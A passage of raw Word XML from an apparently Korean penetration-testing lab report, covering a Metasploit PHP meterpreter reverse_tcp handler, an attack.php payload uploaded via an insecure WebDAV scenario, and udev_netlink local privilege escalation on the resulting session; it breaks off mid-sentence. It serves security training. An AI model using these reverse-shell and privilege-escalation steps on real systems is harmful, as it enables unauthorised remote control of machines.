      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35598">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>set payload php/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F539A59" w14:textId="6FA70463" w:rsidR="00D35598" w:rsidRDefault="00D35598" w:rsidP="00D35598">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35598">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>④</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">set lhost </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ttack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75604957" w14:textId="040DC6DF" w:rsidR="00D35598" w:rsidRDefault="00D35598" w:rsidP="00D35598">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35598">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>⑤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">et lport </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>임의의포트(앞전의 쓰던</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>포트와 동일하게 셋팅)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA7FB48" w14:textId="3438F116" w:rsidR="00D35598" w:rsidRDefault="00D35598" w:rsidP="00D35598">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35598">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>⑥</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07859D7B" w14:textId="77777777" w:rsidR="00D35598" w:rsidRDefault="00D35598" w:rsidP="00D35598">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61AC89FE" w14:textId="6491DFED" w:rsidR="002625EC" w:rsidRDefault="008272E7" w:rsidP="00D35598">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="400"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">) ‘Insecure WebDAV Configuration’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>시나리오 선택</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B0475A" w14:textId="10265D6E" w:rsidR="008272E7" w:rsidRDefault="008272E7" w:rsidP="002625EC">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008272E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 시나리오 선택 후,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> WebDAV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE54BD7" w14:textId="39E2969F" w:rsidR="008272E7" w:rsidRDefault="00A52EA8" w:rsidP="0050432B">
      <w:pPr>
        <w:ind w:firstLineChars="400" w:firstLine="8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3C8050" wp14:editId="0D9624FF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3526811</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>941241</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2032000" cy="388204"/>
                <wp:effectExtent l="19050" t="19050" r="25400" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="1049" name="직사각형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388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65B4F" id="직사각형 1049" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:277.7pt;margin-top:74.1pt;width:160pt;height:30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" filled="f" strokecolor="#c00000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94136D" wp14:editId="6FC2AD13">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3549862</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>710720</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2040271" cy="173051"/>
                <wp:effectExtent l="19050" t="19050" r="17145" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1048" name="직사각형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271" cy="1730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73002" id="직사각형 1048" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:279.5pt;margin-top:55.95pt;width:160.65pt;height:13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" filled="f" strokecolor="#c00000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8A7896" wp14:editId="6D500A13">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1559699</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>295781</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1656069" cy="165367"/>
                <wp:effectExtent l="19050" t="19050" r="20955" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="1047" name="직사각형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69" cy="1653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B1A3A" id="직사각형 1047" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:122.8pt;margin-top:23.3pt;width:130.4pt;height:1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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008272E7" w:rsidRPr="008272E7">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13509644" wp14:editId="69D048C2">
            <wp:extent cx="5760000" cy="2893474"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2159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3474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1914A5" w14:textId="740A6AC7" w:rsidR="00D35598" w:rsidRDefault="0050432B" w:rsidP="00D35598">
      <w:pPr>
        <w:ind w:firstLineChars="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0050432B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">‘attack.php’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">everse_TCP payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">클릭 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAF4E93" w14:textId="51FB04A8" w:rsidR="00D35598" w:rsidRPr="00D35598" w:rsidRDefault="00B81204" w:rsidP="00D35598">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">사용자 관점에서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>attack.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">를 확인하게 될 경우 사용자는 공격자에게 역방향 세션을 연결하도록 시도할 것이며 공격자는 실행해둔 핸들러 파일의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>session 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">이 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">opend </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>된 것을 확인하고</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">추가적인 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>post exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>을 시도할 수 있다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A62AEA8" w14:textId="5416108B" w:rsidR="00B81204" w:rsidRDefault="00A52EA8" w:rsidP="00B81204">
      <w:pPr>
        <w:ind w:firstLineChars="400" w:firstLine="8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D859064" wp14:editId="2ADDD04B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>576141</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1923628</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2973721" cy="134631"/>
                <wp:effectExtent l="19050" t="19050" r="17145" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1050" name="직사각형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721" cy="1346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ACD0D" id="직사각형 1050" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:45.35pt;margin-top:151.45pt;width:234.15pt;height:10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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0050432B" w:rsidRPr="0050432B">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B7293D7" wp14:editId="41AEF6B6">
            <wp:extent cx="5760000" cy="2541421"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1143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41421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C40F0B" w14:textId="5FE03803" w:rsidR="00B81204" w:rsidRPr="00B81204" w:rsidRDefault="00F8104B" w:rsidP="00B81204">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/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7D1B9C2" wp14:editId="03D02C2F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772275" cy="10030460"/>
                <wp:effectExtent l="0" t="0" r="9525" b="8890"/>
                <wp:wrapNone/>
                <wp:docPr id="1035" name="직사각형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0030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6C378" id="직사각형 1035" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:533.25pt;height:789.8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  <w:r w:rsidR="00B81204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">사용자가 </w:t>
      </w:r>
      <w:r w:rsidR="00B81204">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>attack.php</w:t>
      </w:r>
      <w:r w:rsidR="00B81204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">를 클릭했을때 공격자의 커맨드창에서 </w:t>
      </w:r>
      <w:r w:rsidR="00B81204">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00B81204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>이 확립되었다는 것을 확인할 수 있다.</w:t>
      </w:r>
      <w:r w:rsidR="00B81204">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F1591" w14:textId="1A8CA00B" w:rsidR="00B81204" w:rsidRDefault="00A52EA8" w:rsidP="00B81204">
      <w:pPr>
        <w:ind w:firstLineChars="400" w:firstLine="8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E494D3" wp14:editId="67B8E0B8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>544894</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>36195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5352089" cy="434308"/>
                <wp:effectExtent l="19050" t="19050" r="20320" b="23495"/>
                <wp:wrapNone/>
                <wp:docPr id="1051" name="직사각형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2089" cy="4343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55AC1" id="직사각형 1051" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:42.9pt;margin-top:2.85pt;width:421.4pt;height:34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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B81204" w:rsidRPr="00B81204">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED2CD7F" wp14:editId="7E1FABC7">
            <wp:extent cx="5760000" cy="1809012"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2032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09012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5C6D3B" w14:textId="77777777" w:rsidR="00B81204" w:rsidRDefault="00B81204" w:rsidP="00B81204">
      <w:pPr>
        <w:ind w:firstLineChars="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F24B2B3" w14:textId="52AB5F88" w:rsidR="00B81204" w:rsidRDefault="00B81204" w:rsidP="00B81204">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="200"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">) udev </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>취약점 이용</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137CD1BB" w14:textId="718BAE4C" w:rsidR="00A24049" w:rsidRDefault="00A24049" w:rsidP="00A24049">
      <w:pPr>
        <w:ind w:left="600"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">- background </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">모드로 돌아가 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">udev </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">취약점을 이용한 모듈을 사용해서 연결하였던 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>session 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">을 대상으로 권한 상승 시도 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1007F2" w14:textId="39974F1C" w:rsidR="00B81204" w:rsidRDefault="00DF1BF8" w:rsidP="00B81204">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="6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C2B03F" wp14:editId="3D1E2759">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>449516</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1896964</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5543806" cy="157683"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="1052" name="직사각형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806" cy="1576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2EA00" id="직사각형 1052" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:35.4pt;margin-top:149.35pt;width:436.5pt;height:12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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B81204" w:rsidRPr="00B81204">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60798B33" wp14:editId="1AE53223">
            <wp:extent cx="5760000" cy="2046049"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="11430"/>
            <wp:docPr id="151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200D079B-2164-4E24-B221-2B71A27EE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200D079B-2164-4E24-B221-2B71A27EE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46049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78BF37" w14:textId="2E8D8C44" w:rsidR="00B81204" w:rsidRDefault="00B81204" w:rsidP="00A24049">
      <w:pPr>
        <w:ind w:firstLineChars="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100A1A07" w14:textId="272507DD" w:rsidR="00B81204" w:rsidRDefault="00B81204" w:rsidP="00A24049">
      <w:pPr>
        <w:ind w:firstLineChars="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/linux/local/udev_netlink </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465D9EED" w14:textId="10A6B2B5" w:rsidR="00A24049" w:rsidRDefault="00B81204" w:rsidP="00A24049">
      <w:pPr>
        <w:ind w:firstLineChars="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A24049">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE62567" w14:textId="17FABB60" w:rsidR="00A24049" w:rsidRDefault="00B81204" w:rsidP="004A6E64">
      <w:pPr>
        <w:ind w:firstLineChars="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>④</w:t>
      </w:r>
      <w:r w:rsidR="00A24049">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> ex</w:t>
      </w:r>
      <w:r w:rsidR="00A24049">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00A24049">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>loit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D59CE68" w14:textId="1F74EF97" w:rsidR="00A24049" w:rsidRDefault="00A24049" w:rsidP="00A24049">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>프로세스 확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD21BEF" w14:textId="589A9C63" w:rsidR="00A24049" w:rsidRDefault="00A24049" w:rsidP="00A24049">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A24049">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">가 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2861</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">인 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/sbin/udevd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>데몬이 실행 중인 것을 확인할 수 있다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1221C615" w14:textId="48D86549" w:rsidR="00A24049" w:rsidRDefault="00DF1BF8" w:rsidP="00A24049">
      <w:pPr>
        <w:ind w:firstLineChars="300" w:firstLine="6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B28733" wp14:editId="2B7D54D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>411096</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>220867</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5032855" cy="188419"/>
                <wp:effectExtent l="19050" t="19050" r="15875" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="1053" name="직사각형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2855" cy="1884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85699" id="직사각형 1053" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:32.35pt;margin-top:17.4pt;width:396.3pt;height:14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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A24049" w:rsidRPr="00A24049">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67305C03" wp14:editId="42A0C942">
            <wp:extent cx="5760000" cy="589762"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="20320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89762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ACF1CD" w14:textId="77777777" w:rsidR="004A6E64" w:rsidRDefault="00A24049" w:rsidP="004A6E64">
      <w:pPr>
        <w:ind w:left="600"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24049">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PID</w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">가 </w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2861 </w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">이였던 </w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/sbin/udevd</w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>가 부모 프로세스(</w:t>
      </w:r>
      <w:r w:rsidR="004A6E64">
